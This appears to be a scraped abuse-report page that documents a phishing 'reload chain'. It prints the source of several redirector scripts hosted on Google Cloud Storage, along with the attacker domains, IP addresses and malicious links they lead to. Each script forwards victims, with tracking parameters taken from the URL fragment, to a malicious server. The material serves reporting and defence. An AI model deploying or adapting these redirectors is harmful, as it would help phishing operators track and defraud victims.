https://storage.googleapis.com/gotogo/rama1325h.html
Content
<!DOCTYPE html><html>
<head>
...
show morehttps://storage.googleapis.com/gotogo/rama1325h.html
Content
<!DOCTYPE html><html>
<head>
<title>Redirecting...</title>
<meta http-equiv="refresh" content="3; url=http://vmi2396998.contaboserver.net/">
</head>
<body>
<script>
const baseUrl = 'http://vmi2396998.contaboserver.net/';
const fragment = window.location.hash.substring(1); // Extract part after #
if (fragment) {
document.location.href = baseUrl + fragment;
} else {
document.location.href = baseUrl; // Fallback if no fragment
}
</script>
<p>If you are not redirected, <a href="http://vmi2396998.contaboserver.net/">click here</a>.</p>
</body>
</html>
Script used to redirect victims to a next website in the phishing reload chain and to pass thru some parameters to track the victim
Malicious, see
https://www.virustotal.com/gui/domain/vmi2396998.contaboserver.net
https://urlscan.io/search/#vmi2396998.contaboserver.net
show less
https://storage.googleapis.com/darbox/abdeeedarbooxiyeeyjsytzpzezehjsfsydrte.html
Source: <scri ...
show morehttps://storage.googleapis.com/darbox/abdeeedarbooxiyeeyjsytzpzezehjsfsydrte.html
Source: <script>
var url= document.location;
var str1=url.toString();
var res = str1.split("#");
var newurl="http://96.62.102.124.miami-people.edu.eu.org.cdn.cloudflare.net/"+res[1];
window.location.href = newurl;
</script>
Script used to redirect victims to another phishing web domain using some code to track the victim
http://96.62.102.124.miami-people.edu.eu.org.cdn.cloudflare.net/
Malicious IP: 185.176.220.100
See
https://www.virustotal.com/gui/ip-address/185.176.220.100
https://urlscan.io/search/#185.176.220.100
show less
Malicious links:
tinyurl.com/3j9juk2b
dzagdazghdazghdazgh.blackboard.eu.com
tinyurl.com/y4y6pmv ...
show moreMalicious links:
tinyurl.com/3j9juk2b
dzagdazghdazghdazgh.blackboard.eu.com
tinyurl.com/y4y6pmvm
daghdvazghdzakghdazzafd.bitauto.it.com
show less
mkto.mkto-sj030161.com
sdy.familyhospitalsytems.com
dzahdzahjzdaghzaghzadghaz.caijing.com.de
Ph ...
show moremkto.mkto-sj030161.com
sdy.familyhospitalsytems.com
dzahdzahjzdaghzaghzadghaz.caijing.com.de
Phishing
show less
https://storage.googleapis.com/mabololoxy/besales24.html
Google does not take action against this ...
show morehttps://storage.googleapis.com/mabololoxy/besales24.html
Google does not take action against this malicious content.
has the following content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.129.110";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Reloads to 185.80.129.110
Malicious IP:
https://www.virustotal.com/gui/ip-address/185.80.129.110
https://urlscan.io/search/#185.80.129.110
[email protected] does not take action to remove the content on this IP
@RIPE: it is time to remove all IP-ranges from VPSNET.LT. Reporting abuse has no effect.
show less
vmi2388451.contaboserver.net
Source:
<!DOCTYPE html>
<html>
<head>
<title>Redirecting...< ...
show morevmi2388451.contaboserver.net
Source:
<!DOCTYPE html>
<html>
<head>
<title>Redirecting...</title>
</head>
<body>
<script>
// Extract the URL fragment and append it to the new base URL
const baseUrl = 'http://vmi2388451.contaboserver.net/';
const fragment = window.location.hash.substring(1); // Get the part after #
if (fragment) {
document.location.href = baseUrl + fragment;
} else {
document.location.href = baseUrl; // Fallback if no fragment
}
</script>
</body>
</html>
Reloads to vmi2388451.contaboserver.net and takes parameters after # to track the phishing victim
Malicious: see
https://urlscan.io/search/#vmi2388451.contaboserver.net
https://www.virustotal.com/gui/domain/vmi2388451.contaboserver.net
show less
https://storage.googleapis.com/darbox/abdeeedarbooxiyeeyjsytzpzezehjsfsydrte.html
Content:
<scri ...
show morehttps://storage.googleapis.com/darbox/abdeeedarbooxiyeeyjsytzpzezehjsfsydrte.html
Content:
<script>
var url= document.location;
var str1=url.toString();
var res = str1.split("#");
var newurl="http://96.62.102.124.miami-people.edu.eu.org.cdn.cloudflare.net/"+res[1];
window.location.href = newurl;
</script>
Reloads victims to new IP 96.62.102.124 and uses the parameters behind # to redirect victims to real phishing website.
Malicious, see
https://www.virustotal.com/gui/ip-address/96.62.102.124
show less
https://storage.googleapis.com/abbchopo/abhrefly.html
Source code:
<script>
var tarcking_para ...
show morehttps://storage.googleapis.com/abbchopo/abhrefly.html
Source code:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.130.183";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Reloads to malicious IP:
See
https://urlscan.io/search/#185.80.130.183
https://www.virustotal.com/gui/ip-address/185.80.130.183
show less
unassigned.172-81-60-30.spryt.net
https://storage.googleapis.com/gotogo/gh24g11jh.html
Content ...
show moreunassigned.172-81-60-30.spryt.net
https://storage.googleapis.com/gotogo/gh24g11jh.html
Content:
<!DOCTYPE html>
<html>
<head>
<title>Redirecting...</title>
</head>
<body>
<script>
// Extract the URL fragment and append it to the new base URL
const baseUrl = 'http://unassigned.172-81-60-30.spryt.net/';
const fragment = window.location.hash.substring(1); // Get the part after #
if (fragment) {
document.location.href = baseUrl + fragment;
} else {
document.location.href = baseUrl; // Fallback if no fragment
}
</script>
</body>
</html>
Script that takes parameters after # to redirect victims to the next domain in the phishing reload chain and to track the success of the phishing campaign
Malicious:
https://urlscan.io/search/#172.81.60.30
https://www.virustotal.com/gui/domain/unassigned.172-81-60-30.spryt.net
show less
myexclusiveservo.com
Part of phishing reload chain
See
https://urlscan.io/search/#myexclusive ...
show moremyexclusiveservo.com
Part of phishing reload chain
See
https://urlscan.io/search/#myexclusiveservo.com
show less
moviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
Source:
<s ...
show moremoviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
Source:
<script>document.location.href = 'http://moviedownloadserver.com//anchor'+window.location.href.split('#')[1];</script>
Script used to redirect victims to another domain, passing thru some parameters.
Malicious, see:
https://www.virustotal.com/gui/domain/moviedownloadserver.com
https://urlscan.io/search/#moviedownloadserver.com
show less
moviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
Source:
<s ...
show moremoviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
Source:
<script>document.location.href = 'http://moviedownloadserver.com//anchor'+window.location.href.split('#')[1];</script>
Script used to redirect victims to another domain, passing thru some parameters.
Malicious, see:
https://www.virustotal.com/gui/domain/moviedownloadserver.com
https://urlscan.io/search/#moviedownloadserver.com
show less
helpinneed.asso.eu.org
https://storage.googleapis.com/euzku8ha196ebhc2/4mtei3h5rnrvd2it/9c8e3bd.h ...
show morehelpinneed.asso.eu.org
https://storage.googleapis.com/euzku8ha196ebhc2/4mtei3h5rnrvd2it/9c8e3bd.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://helpinneed.asso.eu.org";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
Script is used by phishing criminals to redirect victims to another domain
Malicious, see
https://urlscan.io/search/#helpinneed.asso.eu.org
https://www.virustotal.com/gui/domain/helpinneed.asso.eu.org
show less